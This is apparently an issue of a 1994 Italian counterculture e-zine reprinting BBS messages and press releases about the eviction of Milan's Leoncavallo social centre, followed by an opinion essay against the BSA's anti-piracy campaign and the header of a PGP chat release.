Msg#: 6762 Date: 23 Aug 94 14:08
From: snd Read: Yes Replied: No
To: All Mark:
Subj: leo
strutture e compagni del leoncavallo sono, ancora per
qualche giorno, ospiti del centro sociale spazzali,
in via amantea, quartiere baggio (mm bandenere + bus 67 )
questa mattina l'azienda elettrica municipale ha staccato
acqua ed elettricita' al centro sociale spazzali, e sono
inoltre iniziati i lavori delle ruspe x costruire, nell'area
un tempo occupata dal tendone di "su la testa", un parcheggio
ed una strada ...
Msg#: 6763 Date: 24 Aug 94 00:49
From: snd Read: Yes Replied: No
To: All Mark:
Subj: spazzali
acqua e corrente, staccati stamattina come promesso
dal sindaco estivo nei giorni scorsi, questo pomeriggio
sono stati riattacati
lo spazzali e' intestatario di regolari contratti ed ha
altrettanto regolarmente pagato le bollette
si pensa che che la sospensione delle forniture sia stata
dovuta ai lavori di scavo iniziati oggi nello spiazzo
dietro al centro sociale, per costruire una strada ed
un parcheggio
l'azienda energetica municipale non ha fornito spiegazioni
ne' aveva dato formale comunicazione della sospensione,
sia pure temporanea, dei servizi
Msg#: 6146 Date: 10 Aug 94 16:09
From: snd Read: Yes Replied: No
To: All Mark:
Subj: sgombero point ecn-leoncavallo
ola'
una piccola curiosita' "a latere" dello sgombero del leo:
i digotti, nello sgombero del Leoncavallo
dai locali della Krupp, si sono portati anche
due "experti informatici", che hanno provveduto sul posto
ad eseguire un accurato backup dell'HD del PC
su cui c'era il point ecn del leo ( 45:1917/1.71 )
e tutto il materiale dei vari collettivi, gruppi,
singoli, "amministrazione", ecc.
piu' tardi nella giornata ci e' stato possibile
portare via il PC
! Origin: European Counter Network - Milano (45:1917/1)
SEEN-BY: 1/1 5/1 9/1 10/2 999/999 1000/1 4 1100/1 1200/1 2 5 6 1400/1
SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1
Msg#: 6205 Date: 11 Aug 94 20:44
From: Gomma Read: Yes Replied: No
To: snd Mark:
Subj: sgombero point ecn-leoncavallo
Ciao snd:
> due "experti informatici", che hanno provveduto sul posto
> ad eseguire un accurato backup dell'HD del PC
> su cui c'era il point ecn del leo ( 45:1917/1.71 )
> e tutto il materiale dei vari collettivi, gruppi,
> singoli, "amministrazione", ecc.
Non riesco a capire a quale titolo e con quale diritto. Sui giornali il que-
store Serra ha affermato che niente era stato posto sotto sequestro. Com'e'
possibile dunque, se un PC non e' posto sotto sequestro, o non sia indagato
per qualche ragione il proprietario del PC, che i dati vengano copiati e
trattenuti? Mi sembra una palese violazione del diritto alla privacy. Dentro
la macchina vi potevano essere corrispodenze private, ad esempio, o file
riguardanti la sfera privata di qualcuno.
E' stata data qualche giustificazione o vi siete accorti dell'accaduto solo
successivamente?
From: ECN Milano Read: Yes Replied: No
Subj: comunicato c.s. leoncavallo
Comunicato Stampa
Nella mattina di oggi, mercoledi' 24 agosto 1994 il Centro sociale
Leoncavallo ha presentato alla Questura di Milano un preavviso per
lo svolgimento di una manifestazione pubblica. L'iniziativa, un
presidio permanente dal giorno 27 agosto al giorno 4 settembre,
si terra' in via Bertelli, a fianco dell'anfiteatro del Parco
della Martesana, da anni in stato di totale e colpevole
abbandono.
Dopo la farsa intrapresa dal sindaco d'agosto Tordelli allo scopo
di debellare l'illegalita' nella citta' di Milano e gli avversari
politici dell'amministrazione, nel corso dei tre giorni di
iniziativa tenutasi presso il centro sociale Spazzali di Baggio,
ragione vorrebbe che venisse risparmiata alla citta' una penosa e
rischiosa replica. A tale scopo non sono previsti atti o
attivita' soggette a iter autorizzativi del Comune di Milano: ogni
ulteriore divieto allo svolgimento delle iniziative del Centro
Sociale leoncavallo ricade pertanto esclusivamente nella
violazione, sistematica in questa citta', delle liberta' di
organizzazione ed espressione politica.
Leggiamo inoltre con stupore dalla stampa quotidiana le vicende
relative al miliardo di danni che sarebbe stato arrecato alla
palazzina di via Salomone 71 di proprieta' della ditta Krupp; a
tale proposito abbiamo sempre rilevato come non possano
considerarsi danni, bensi' migliorie, alcune, tra l'altro, di
indiscutibile pregio, le trasformazioni apportate al fine di
trasformare l'uso di detto immobile al fine di renderlo atto ad
accogliere attivita' di tipo sociale e comunitario. Tutt'altra
cosa sono i danni arrecati allo stabile dalla polizia che, senza
scrupolo alcuno, hanno demolito muri e divelto porte
nell'esecuzione della "difficile" operazione sgombero del 9
agosto. Rileviamo inoltre che la spesa sostenuta dallo stato al
fine di consentire sulla vicenda del Leoncavallo la speculazione
di molteplici parti politiche, avrebbe consentito l'allocazione
di decine di realta' associative e l'esplicazione di innumerevoli
servizi.
Avvicinandosi la ripresa dell'attivita' produttiva e politica
nella citta', nella quale comprendiamo anche la manifestazione
nazionale del 10 settembre e tre giorni di iniziativa politico
culturali ad essa connessi ( il 9/10/11 settembre ) riteniamo
debbano cessare le provocazioni operate dalla giunta di Milano
contro le realta' sociali oggetto in questa estate di insensato
attacco.
Milano, 23 agosto 1994
Centro Sociale Leoncavallo
-!-
! Origin: European Counter Network - Milano (45:1917/1)
SEEN-BY: 1/1 5/1 9/1 30/1 1000/1 4 1100/1 1200/1 5 7 1400/1 1500/3 1600/1
SEEN-BY: 1800/1 1900/1 1917/1 2 3 11 2000/1
Msg#: 6887 Date: 25 Aug 94 18:14
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: com. stampa Comune di Milano
Comune di Milano
Ufficio Stampa
25 agosto 1994
E' pervenuta all'Amministrazione comunale una richiesta di occupazione di suo-
lo pubblico, da parte dei signori D.F. e M.M., per un presidio in via Bertelli
(parco Martesana), dalle ore 14 di sabato 27 agosto alle 23.00 di domenica 4
settembre.
L'Amministrazione comunale ha ritenuto di non accogliere la richiesta, non
essendo possibile concedere il Parco della Martesana, sia perche' non usuale
che simili manifestazioni si svolgano all'interno di parchi, sia perche' ne
potrebbe derivare un dano al tappeto erboso.
In alternativa, l'Amministrazione ha concesso ai signori D.F. e M.M., sotto la
loro responsabilita', l'occupazione di suolo pubblico in piazza Lima, dalle
ore 7.30 alle ore 19.30, nei giorni 27 e 28 agosto (per due giorni quindi, co-
me di consuetudine con altri Enti e associazioni) per effettuare la raccolta
firme.
La concessione e' subordinata al rispetto dei regolamenti vigenti ed e'
revocabile in qualsiasi momento.
Le decisioni dell'Amministrazione sono state comunicate ai signori D. e M. nel
pomeriggio di oggi.
Msg#: 6888 Date: 25 Aug 94 18:23
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: Com Stampa C.S. Leoncavallo
Centro Sociale LEONCAVALLO
COMUNICATO STAMPA
IL RIDICOLO E L'ARBITRIO
Milano, 25 agosto 1994
Nella giornata di oggi il Comando dei Vigili Urbani ha dato risposta alla
richiesta di autorizzazione per "occupazione di suolo pubblico", avanzata
"secondo i termini di legge" dal Centro Sociale Leoncavallo, con un banchetto
per la raccolta di firme che avrebbe dovuto tenersi da sabato 27 agosto a
domenica 4 settembre in via Bertelli presso il Parco della Martesana, nel cor-
so di un presidio permanente.
Si tratta di un normale atto amministrativo, quotidianamente assolto dai
comandi di zona dei Vigili Urbani, in caso di petizioni popolari e raccolte di
firme da parte di associazioni e anche di normali cittadini.
I Vigili Urbani hanno comunicato che l'Assessorato al Traffico, Trasporti e
Viabilita' aveva INVECE autorizzato un banchetto in piazza Lima, dalle 7,30
alle 19,30, per i soli giorni 27 e 28 agosto, adducendo quale giustificazione
di questo arbitrio che "PER CONSUETUDINE a Milano le raccolte di firme si fan-
no in piazza Lima" !!!
Ricordiamo che la richiesta di via Bertelli e' motivata dalla precisa volonta'
- piu' volte espressa in questi mesi dai centri sociali autogestiti - di esse-
re presenti in quelle allre della citta' dove piu' palesi sono il degrado e
l'abbandono da parte dell'amministrazione pubblica.
Nel Parco della Martesana e' sito un anfiteatro da 700 posti e una struttura
coperta di 500 mq costruita 2 anni fa da un'impresa edile a compensazione di
oneri di urbanizzazione, e destinata ad usi sociali, MAI PRESA IN CONSEGNA DAL
COMUNE.
La motivazione addotta da Palazzo Marino e' un palese pretesto per esercitare
l'ennesimo arbitrio nei confronti dei centri sociali autogestiti, poiche' l'u-
so della stessa area e' gia' stato autorizzato in passato per iniziative simi-
li, ultima delle quali quella tenuta agli inizi di giugno dal Partito Umani-
sta.
Msg#: 6925 Date: 26 Aug 94 16:21
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: leo alla martesana
Milano, 26 agosto 1994
COMUNICATO STAMPA
Mentre qualche giornale straparla di agguati a base di pane secco,
uova e porfido (?) ben piu' serio attentato il Comune di Milano va
preparando ai danni della liberta' di espressione ed associazione
politica.
Domani alle ore 14,30 il Centro Sociale Leoncavallo si rechera' in
via Bertelli per iniziare il presidio permanente preannunciato nei
termini di legge all'autorita' di Pubblica Sicurezza.
A tale proposito informiamo che nessun divieto e' stato posto a
tale iniziativa non essendo tra i compiti istituzionali di
qualsivoglia ufficio comunale regolare le liberta' politiche nella
citta' di Milano. In mancanza di ulteriori accadimenti il divieto
imposto dalla vigilanza urbana riguarda soltanto la presenza di un
banchetto atto alla raccolta di firme.
Nel corso dell'iniziativa verra' denunciato lo stato si colpevole
abbandono in cui versa l'anfiteatro sito ai margini del Parco
della Martesana come del resto svariati altri immobili di
proprieta' comunale. A tale scopo verra' organizzata la raccolta
degli innumerevoli stratificati reperti (siringhe...) di cui e'
dotata da anni la struttura e la loro consegna all'autorita'
comunale.
Ringraziamo sentitamente la vigilanza urbana per l'autorizzazione
concessa per i giorni 27/28 agosto in piazza Lima e valutando se
accettarla, ricordiamo pero' che nessuna l'ha mai chiesta.
Contiamo sulla presenza del Sindaco Formentini per constatare,
come gia' il suo sostituto Tordelli, che non vengano tenuti
pericolosi concerti nel corso dell'iniziativa e informiamo fin da
subito la vigilanza urbana, l'autorita' di Pubblica Sicurezza, la
Protezione Civile... che la prevista proiezione serale verra'
regolarmente effettuata con due grossi autonomi che reggeranno lo
schermo e due piu' piccoli con in mano il proiettore; l'eventuale
autorizzazione per l'occupazione di suolo pubblico non avra'
pertanto superficie superiore a otto piedi.
Centro Sociale Leoncavallo
Msg#: 6926 Date: 26 Aug 94 16:47
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: leonka vive, milano brucia
ANSA - MILANO 26 AGOSTO
Un incendio ha distrutto la scorsa notte tre prefabbricati adibiti
a uffici e spogliatoi per operai nel cantiere edile che sorge in
via Leoncavallo a Milano nell'area della vecchia sede dell'omonimo
centro sociale.
Stamane alla redazione milanese dell'ANSA e' giunta una telefonata
di rivendicazione: "questa e' una rivendicazione, non e' uno
scherzo - ha detto una voce maschile - questa notte abbiamo
colpito il cantiere di via Leoncavallo. Contro il divieto a
manifestare. Sul Leoncavallo non costruirete niente. Azione
Diretta".
Secondo i primi accertamenti condotti dalla polizia sul luogo non
sono stati trovati segni di liquido infiammabile, ma non viene
esclusa la matrice dolosa dell'incendio. Un cancello in ferro
all'angolo fra via Mancinelli e via Leoncavallo, dal quale si
accede al cantiere e' stato trovato aperto. Le fiamme si sono
sviluppate verso le 3 e l'intervento dei vigili del fuoco e'
durato circa un'ora e mezza. L'impresa Morganti di Milano che
coordina i lavori per la costruzione di un condominio sull'area
che per circa vent'anni ha ospitato la sede storica del centro
Leoncavallo non ha ancora fatto un bilancio dei danni, che
ammonterebbero comunque a qualche decina di milioni di lire.
Intanto non e' stata presentata alcuna denuncia nei confronti dei
giovani del centro leoncavallo, sorpresi ieri nei pressi
dell'aeroporto di Linate proprio mentre arrivava in aereo da Olbia
il sindaco di Milano Marco Formentini. Secondo la Digos e i vigili
urbani, il gruppo stava forse preparando una protesta contro il
sindaco. Dietro un cespuglio sono stati trovati cubetti di
porfido, uova, pezzi di pane secco e una tanica contenente
detewrsivo. Poco distante, appeso ad un sottopasso in viale
Forlanini, la strada che dall'aeroporto porta verso il centro
citta', c'era uno striscione con la scritta "LEONKA VIVE, MILANO
BRUCIA".
Oggi il centro sociale ha comunicato che domani si rechera' in via
Bertelli all'interno del parco della Martesana per denunciare lo
stato di abbandono in cui versa l'anfiteatro e altri immobili
comunali. Ieri l'amministrazione comunale aveva reso noto di non
aver concesso l'autorizzazione al presidio in via Bertelli dando
il via libera invece per una raccolta di firme in piazza Lima.
"Ringraziamo per l'autorizzazione concessa in piazza Lima - hanno
scritto i leoncavallini in un comunicato diffuso oggi - e
valutando se accettarla ricordiamo pero' che nesuna l'aveva mai
chiesta".
Msg#: 6927 Date: 26 Aug 94 16:48
From: ECN Milano Read: Yes Replied: No
To: tutti Mark:
Subj: da domani alla martesana
quindi da domani saremo al parco della martesana,
in via bertelli, mm gorla - bus 56
se non ci sara' consentito saremo altrove :-)
Msg#: 6928 Date: 27 Aug 94 01:04
From: snd Read: Yes Replied: No
To: All Mark:
Subj: leo
i vigili urbani hanno piazzato fin da questo pomeriggio
una macchina proprio davanti all'anfiteatro di parco
martesana ( paura, eh ?!? )
l'appuntamento e' comunque confermato :-)
Msg#: 7008 Date: 27 Aug 94 16:49
From: snd Read: Yes Replied: No
To: All Mark:
Subj: sgomberato c.s. barricate a parma
SGOMBERATO IL CSOA BARRICATE (Parma)
Martedi' 23 Agosto, Digos, polizia e vigili urbani, per
ordine del sindaco Lavagetto (PDS) hanno sgomberato il centro
sociale autogestito "barricate" dopo che l'occupazione si era
protratta per piu' di 9 mesi per la quarta volta in meno di
due anni i poteri forti della citta' (massoneria, unione
industriali, partiti, polizia) usano la violenza per colpire
il bisogno di spazi di autogestione e di organizzazione delle
lotte proletarie contro la vita alienata che il sistema del
dominio impone ogni g
iorno sul lavoro, nella scuola, nel
tempo libero.
Il massone Lavagetto e i suoi servi non si illudano di
risolvere in questo modo la questione degli spazi sociali. La
contraddizione e' forte e si ripropone ogni giorno: ieri un
altro morto di eroina ci ha fatto comprendere ancora una
volta come anche Parma non abbia un'alternativa sociale e
culturale alla disperazione ed alla solitudine.
Il nostro centro sociale e' stato un tentativo di dare
un'alternativa umana e socialmente positiva a un grande
spazio inutilizzato e destinato allo sfacelo o alla
speculazione.
Il nostro sindaco e il suo partito - PDS - legati a doppio
filo all'unione industriali e ai poteri occulti della citta'
legittimano con la loro partecipazione attiva le manovre piu'
sporche di speculazione edilizia sulle "aree dismesse" (vedi
ruolo della SINCO, cooperativa vicino al PDS e gli arresti di
alcuni dei dirigenti del partito in relazione allo scandalo
dell'ex Robuschi). Il "nostro" sindaco e' poi stranamente il
notaio che sancisce l'operazione di acquisto dell area ex
Robuschi da parte del consorzio di imprenditori "La corte".
La differenza del'"progressista" Lavagetto ed il leghista
Formentini che ha sgomberato il csoa Leoncavallo sono
inesistenti: in realta' Lavagetto e' come Formentini.
Promettiamo al sindaco e al PDS che lui ed "i suoi amici"
pagheranno tutte le conseguenze politiche di questo sgombero.
Nessuna giustizia nessuna pace
collettivo spazi sociali
CSOA BARRICATE - PARMA
Msg#: 7009 Date: 27 Aug 94 16:56
From: snd Read: Yes Replied: No
To: All Mark:
Subj: leoncavallo alla martesana
questo pomeriggio alle 14,30 (come da programma)
la comunita' nomade del leoncavallo si e' felicemente
insediata presso l'anfiteatro del parco della
martesana, in via bertelli (venendo da via padova si gira
in via agordat e poi sempre dritto - sono 200 m )
poiche' il comune di milano ha proibito la raccolta di
firme prevista, questa la faremo un'altra volta :-)))
il posto e' incantevole, accorrete numerosi !!!
Msg#: 7057 Date: 28 Aug 94 02:33
From: snd Read: Yes Replied: No
To: All Mark:
Subj: comunicato c.s. leoncavallo
FORMENTINI COME BRAMIERI
Che Formentini fosse "il sindaco di tutti i milanesi" lo
scrivono da tempo i quotidiani ma che fosse anche il comico
(e che comico!) di tutti i milanesi questo dovevamo ancora
scoprirlo.
Come dobbiano altrimenti interpretare le dichiarazioni
pubbliche apparse oggi sui quotidiani se non come barzellette
della miglior tradizione?
Ecco cosi' che un contenitore di detersivo (perche' anche i
leoncavallini si lavano??!!!) diventa subito "diserbante (che
e' infiammabile)", quattro volantini appesi allegramente per
le strade di Courmayeur diventano una "spedizione
squadristica". E le uova: anche se comprate in giornata
quelle degli autonomi sono sempre "marce"!
Che la signora Augusta poi non si senta tranquilla "nemmeno
quando va dal parrucchiere", beh e' un problema tutto suo.
Noi non possiamo fare altro che consigliarle di cambiare
parrucchiere.
Per quanto riguarda poi il "disprezzo della gente" crediamo
invece che sempre maggiore sia l'insofferenza verso
l'inettitudine dell'amministrazione leghista, e basterebbe al
"sciur sindich" e signora girare la citta' in tram invece che
scortati sulle loro auto di rappresentanza.
Ci sarebbe solo da ridere, se non fosse che affermazioni
cosi' deliranti (purtroppo non dettate solo dal sole
d'agosto) servoo a coprire l'inefficienza di un sindaco e di
una giunta che nulla hanno fatto per il recupero di intere
strutture e aree verdi di proprieta' del comune sotratte ad
un uso sociale e abbandonate al piu' completo degrado, in
attesa forse di tempi piu' propizi alla speculazione! Che
mentre chiude i centri sociali autogestiti e interamente
autofinanziati discute la "privatizzazione" di quelle poche
strutture territoriali esistenti (vedi centri giovani, centri
territoriali, ecc.) affidandole con cospicui finanziamenti
alla Compagnia delle Opere. Altro che occuparsi di giovani:
un vero e proprio scambio politico con interi settori del PPI
(leggi ex dc). Che spende miliardi per finanziare iniziative
culturali d'elite e impedisce lo svolgersi di manifestaazioni
popolari a bassi costo orgaizzate da "liberi cittadini". Che
usa la macchina amministrativa e burocratica come una
schiaccia sassi per azerare qualunque foerrma di dissenso
politico e sociale presente sul territorio. Che ...
Centro Sociale Leoncavallo
Msg#: 7134 Date: 30 Aug 94 01:32
From: ECN MILANO Read: Yes Replied: No
To: Tutti Mark:
Subj: x una manifestazione a milano il 10 settembre
PER UNA MANIFESTAZIONE NAZIONALE A MILANO IL 10 SETTEMBRE
A conclusione di tre giorni di iniziativa politica e di
dibattito tenutisi presso il C.s. Sergio Spazzali Hachmi di
Baggio il 19-20-21 agosto, le realta' presenti hanno definito
il seguente comunicato, rivolto principalmente a quanti, in
tutto il paese hanno seguito le vicende dell'agosto milanese
e a quanti nei prossimi mesi saranno chiamati per propria,
personale o collettiva , situazione, a rispondere alla
negazione di diritti fondamentali sul piano delle condizioni
materiali e delle liberta' politiche e di espressione
culturale.
Con lo sgombero del C.s. Leoncavallo e il parziale
smantellamento del C.s. Spazzali si sono chiariti ulteriori
elementi del programma con il quale la destra politica e
sociale intende governare il paese. A cominciare da quelle
zone dove le elezioni amministrative prima e le politiche
dopo hanno consegnato un identico segno politico tra potere
centrale e locale.
Abbiamo ribadito , ancora nel trascorso mese di luglio, che
un attacco all'esperienza dei centri sociali milanesi avrebbe
avuto il significato di una rottura profonda con un intero
tessuto sociale; in una situazione in cui alle movenze
generali, tutte a danno dei soggetti subalterni, sui temi
della casa, del reddito, dell'istruzione, della generale
privatizzazione dei servizi... si e' velocemente assommata la
gestione della citta' operata dalla Lega Nord che ha visto la
progressiva compressione delle opportunita' di espressione
politica e culturale.
Le trasformazioni produttive degli ultimi decenni hanno
evidenziato nuovi soggetti sociali portatori di forme proprie
di organizzazione politica e della rappresentanza
autorganizzata nei luoghi del lavoro. L'attacco ai centri
sociali, l'esclusione sistematica delle associazioni e delle
realta' di base da parte della macchina burocratica
dell'amministrazione comunale piegata ai fini della battaglia
politica, il divieto reiterato imposto da mesi all'iniziativa
politica, fosse essa corteo, presidio, festa, hanno pertanto
una gravita' particolare.
La bandiera della lotta all'illegalita' si e' avvitata e ha
sconfinato nel diritto di esercizio delle liberta' politiche
e sindacali, affiancandosi ad un uso politico della
magistratura che ha prodotto nell'ultimo anno, sul solo
territorio milanese, oltre 800 denuncie, decine di processi,
svariate condanne estese sempre piu' ai soggetti vari con
motivazioni pretestuose. sempre piu' tese all'intimidazione.
Analoghi segnali ci giungono da piu' parti del paese, anche
se in un quadro di differente organicita', volta
quest'ultima, pensiamo, alla distruzione delle forme di
visibilita' e organizzazione che questi nuovi soggetti
esprimono.
Tale processo non puo' eesere stato intrapreso senza la
precisa intenzione di marginalizzare questo orizzonte e
radicalizzarne le forme di lotta.
C'e' un'intera generazione politica che, ancora una volta,
viene posta di fronte a dinamiche di esclusione,
all'impossibilita' di esprimere l'opposizione nelle infinite
emergenze di cui e strumentalmente piena la storia di questo
paese.
Una generazione che dovra' assumersi dunque la
responsabilita' di un rapporto con "l'illegalita' " crescente
dei propri comportamenti , e dall'altro il compito di
reinventare gli spazi e le forme della propria agibilita'
politica sul territorio.
Abbiamo inoltre rilevato in questi mesi il definitivo decesso
dell'opposizione della sinistra istituzionale nella citta' di
Milano, come parte di un piu' generale quadro nazionale.
Una presenza questa in balia dei forti poteri che ridisegnano
il territorio, che costringono il lavoro vivo presente
saccheggiando quello passato, limando i redditi reali e le
pensioni, che liquidano il diritto alla casa come quello alla
salute, che occupano i centri del potere come fonte di
interesse privato....
Non possiamo dunque maggiormente indugiare dal mettere in
campo un impegno che assuma la forma, nei mesi a venire, di
una mobilitazione generale della variegata presenza
autogestionaria, autorganizzata, anticapitalista.
Gia' nei mesi passati quest'area politico sociale ha avuto la
forza di formulare, nel complesso, una rinnovata capacita'
progettuale alla ricerca di un tessuto possibile tra i fili
delle sue molte componenti. Una duttile allenza, dicemmo, in
grado di rispondere alla necessita' di opposizione radicale
che questa fase politica ci consegna.
Ci sembra di poter proporre, sul complesso dei temi
evidenziati in questo breve comunicato, un corteo nazionale
he apra, a Milano, la stagione delle lotte sociali, il 10
settembre.
Una iniziativa all'interno di tre giornate di dibattito e
spettacolo (nelle date del 9/10/11 settembre) sul quale grava
gia' l'ombra di un ennesimo divieto, a ribadire ulteriormente
il dato di una citta' sottoposta da molti mesi ad un regime
speciale per l'ordine pubblico.
Il governo militare della citta', percorsa e presidiata da
altrettanti mesi dalle truppe del Ministero degli Interni, e'
la testimonianza palpabile della fragilita' del suuo corpo
politico dirigente e della sua amministrazione.
CHI GOVERNA CHI? E' la sfida che abbiamo aperto nella
discussione di questa settimana, accingendoci a predisporre
gli strumenti affinche' tale domanda non rimanga tale.
Per intanto invitiamo tutti coloro cui questo appello e'
rivolto a mobilitarsi affinche' venga affermato il diritto
della liberta' di organizzazione ed espressione politica,
quanto quello all'autogestione, nella citta' di Milano e in
generale nel paese.
A qualunque prevedibile divieto, di fronte all'esercizio di
un diritto quale quello di manifestare un'opposizione reale
che va dall'aurtorganizzazione all'autogestione fino
all'associazionismo e alle molteplici forme della
rappresentanza e della democrazia diretta, sapremo rispondere
in modo adeguato e di massa, il divieto e' quindi da
considerarsi un vero e proprio attacco nei confronti di chi,
facendo uso della ragione, ridetermina l'opposizione in
questo paese attraverso rapporti di forza stabili.
L'APPUNTAMENTO PER TUTTI I COMPAGNI/E E' PER LA
MANIFESTAZIONE DEL 10 SETTEMBRE A MILANO E PER UNA TRE GIORNI
DI MUSICA MA ANCHE DI DIBATTITO IN LUOGO ANCORA DA STABILIRE.
PER I COMPAGNI/E CHE VOGLIONO VENIRE A MILANO FATE ARRIVARE
UN FAX ALLO 0339226820360.
Milano, 28 Agosto
Le realta' promotrici della tre giorni antifascista e
antirazzista del 19-20-21 Agosto e della manifestazione del
10 Settembre.
-----------------------------FINE MESSAGGI---------------------------------
Questi sono i messaggi che ho trovato ... che ne pensate ? Io ritengo che
la situazione sia semplicemente TERRIFICANTE ! Se volete dire la vostra scri-
vete pure alla ns redazione, IN PGP, agli indirizzi di posta elettronica che
troverete in fondo alla rivista. E ricordatevi che cerchiamo sempre collabora-
tori !!!
Dupree's Paradise
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 12
---------------------------------------
CHI TUTELA DANNEGGIA ANCHE TE !
di
M B F
-----------------------------------
[N.d.R. Abbiamo trovato questo messaggio nelle aree CYBERNET. E' semplicemente
FANTASTICO, sarebbe da fargli un MONUMENTO. Leggetelo, e se avete commenti in
proposito, scriveteci pure.]
Con l'augurio che il testo di questo msg finisca nelle mani di qualche respon-
sabile della BSA, ed in riferimento all'apertra dello speciale "Italian crac-
kdown" (Decoder 9), esprimo il mio parere sulla strategia di tutela software
intapresa dalla suddetta associazione.
Smentiamo l'"originale" slogan "Chi copia danneggia anche te !".
La pirateria software puo' danneggiare rivenditore, produttore e autore del
programma, ma e' priva di fondamento la dichiarazione che il fenomeno finisca
col danneggiare l'utente. La duplicazione del software, sorta di concorrente
invisibile al dominio delle software houses, ha sempre, ed e' storia, stimola-
to in modo positivo il mercato: se il produttore non avesse avuto questa sorta
di nemico fantasma contro cui combattere, giammai avrebbe offerto all'utente
gadgets, assistenza post-vendita, consulenze, pacchetti a condizioni speciali.
Le incriminate reti telematiche amatoriali sono oggi, pur considerato l' ine-
vitabile rischio di copie abusive, il piu' grande, rapido e capillare supporto
al beta-testing, allo shareware e ad altre strategie di collaudo e vendita che
nessuna software house si sarebbe potuta singolarmente permettere: una colos-
sale rete di presentazione, discussione e distribuzione demo del prodotto che
inevitabilmente spinge diversi utenti all' acquisto dell'originale.
In ogni forma ed in ogni caso, dalla diffusione amatoriale del software l'u-
tente ha sempre tratto vantaggi ed i produttori, che oggi tra i miliardi in-
cassati piangono miseria, anche. Si sono fatti conoscere senza spendere una
lira in pubblicita' e questo porta inevitabilmente a contatto gli utenti con i
prodotti originali.
L'esperienza italiana ha dimostrato, dalla benzina alle assicurazioni, che le
associazioni di categoria, ottenuto il controllo totale del mercato, se ne so-
no sempre fottute dell'utente e, ben lungi dallo scendere in reale concorrenza
tra loro, i singoli produttori si sono trovati immediatamente concordi nel-
l'aumentare i prezzi e diminuire la qualita' dei servizi.
I produttori di software, che non fanno eccezione, non aspettano altro che la
legge sulla tutela li lasci padroni del campo in modo da poter imporre prodot-
ti scadenti a prezzi maggiorati, ben sapendo che l'utente sara' costretto ad
accettare per mancanza di alternative: i segnali premonitori in questa dire-
zione (tipicamente riservati al nostro Paese) non mancano.
Se qualcuno di voi ama testare il software, smentira' con facilita' il secondo
dogma su cui poggia l'attuale concetto di tutela del medesimo: la leggenda se-
condo la quale il programmatore si farebbe un culo grande come una portaerei
per realizzare il prodotto. Ebbene, i programmi "leggeri" (i videogiochi, per
intenderci) comportano spesso e volentieri una difficolta' di realizzo abis-
salmente superiore al gestionale da prezzo milionario tanto decantato.
Il realizzatore di businnes software si appoggia al sistema operativo che gen-
tilmente gli processa tutte le funzioni di interfaccia utente senza fargli
spendere due righe di codice, o in alternativa all'incredibile numero di li-
brerie che un linguaggio ad alto livello possiede; e' inoltre piuttolto radi-
cata l'abitudine di far proliferare il software commerciabile passando al col-
legatore gli stessi moduli oggetto, differentemente ordinati, con le modifiche
necessarie e sufficienti a non far capire al cliente che nascoste in due o tre
etichette distinte ci sono in realta' le stesse routines. La disposizione del-
le icone in utilities del tutto diverse, e' straordinariamente simile; in que-
sto modo il programmatore evita di ricalcolarsi ascissa ed ordinata di rileva-
zione evento in piattaforma grafica ed incassa n volte i diritti vendendo lo
stesso modulo allo stesso utente.
Piu' che i realizzatori di piattaforme, peraltro contenti delle royalities mi-
liardarie che ogni giorno piovono sul loro capo, sono questi programmatori di
secondo livello a premere oggi per la tutela del loro "ingegno" chiedendo i-
noltre la brevettazione dell'algoritmo come supplementare metodo per realizza-
re denaro (come se gli eredi di Piatgora chiedessero una somma a chiunque vo-
lesse calcolare l'ipotenusa dati i cateti).
Altre simpatica pratica introdotte dagli sviluppatori di software e' l'espan-
sione artificiale di un file (che viene gonfiato allocando aree di memoria i-
nutili o del tutto superflue) in modo da impressionare l'utente con il numero
di dischetti che costituisce l'applicativo e giustificare il costo.
Indimostrabile ma credibile, infine, il contributo nascosto dato (in cambio di
altri favori) dai mercanti del software a quelli dell'hardware mediante la
scelta di architetture sw, tutt'altro che indispensabili ed insostituibili,
che obbligano l'utente a costose modifiche dell'hardware.
Ora sapete cosa vuole proteggere la BSA. Essendo lo Stato il suo cliente idea-
le (i ministeri italiani comprano qualunque porcata di prodotto tanto paga il
contribuente), e prendendo atto del fatto che tale associazione non si e' mai
premurata di mettere in discussione gli elevatissimi profitti concedendo agli
enti pubblici software a condizioni agevolate (le proposte fatte sono, in ter-
mini di mercato reale, una vergogna), riesaminate lo slogan e chiedetevi se di
fatto il contribuente non sia piu' danneggiato da questa forma di tutela che
prevede che l'utente paghi e taccia. I costi dell'adeguamento alla normativa
di tutti gli enti pubblici italiani, multe comprese, li paghiamo noi tutti.
Lo Stato legifera e il cittadino scuce.
Ma chi tutela l'utente dai bugs del programmatore, dai crash di sistema per
errata previsione dello stack, dai mostruosi errori di traduzione, dai collau-
di non fatti, dalle documentazioni approssimative, dalle duplicazioni sbaglia-
te dell'importatore ????
Al massimo vi ridanno una copia del software o vi fanno lo sconto (!) sulla
release successiva... mentre una software house che va a rompere i coglioni in
una scuola elementare perche' uno (UNO !) dei files installati non e' regi-
strato e poi rilascia un eseguibile con bug, dovrebbe sputare sangue per paga-
re un fiume di danni, essere rovinata per sempre.
Perche' alla software house e' stato concesso il diritto di chiedere centinaia
di biglietti da mille per una manciata di righe di compilato mentre se il mio
fornaio chiede 50mila per una pagnotta arrivano (giustamente) i Carabinieri ??
Qualcuno ha la coda di paglia, teme che l'utente abbia il materiale per fare
dei confronti e per scoprire le sporche manovre dei signori del software...
allora si chiudano le reti, si proibisca la duplicazione a tutti i livelli, si
promuova una campagna delatoria nazista del tipo "denunciate il vicino di casa
che copia!" (non e' uno scherzo, purtroppo! Ci sono i tagliandi prestampati
per la denuncia su giornali e riviste) cosi' finalmente anche i prodotti sca-
denti troveranno spazio, l'utente sara' fottuto ancora una volta e gli adepti
della BSA continueranno a sguazzare nel denaro ridendo alla faccia nostra!
M F B
[N.d.R. Sono commosso ! Sigh ! ;'( ]
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 13
[N.d.r. Questo file e' in INGLESE. Rompetevi le corna. *;) ]
From: jabowery@netcom.com (Jim Bowery)
Subject: PGPCHAT Release 1.0
Date: Mon, 6 Jun 1994 19:45:05 GMT
PGP WIN-DOS CHAT
--- ---
Release 1.0
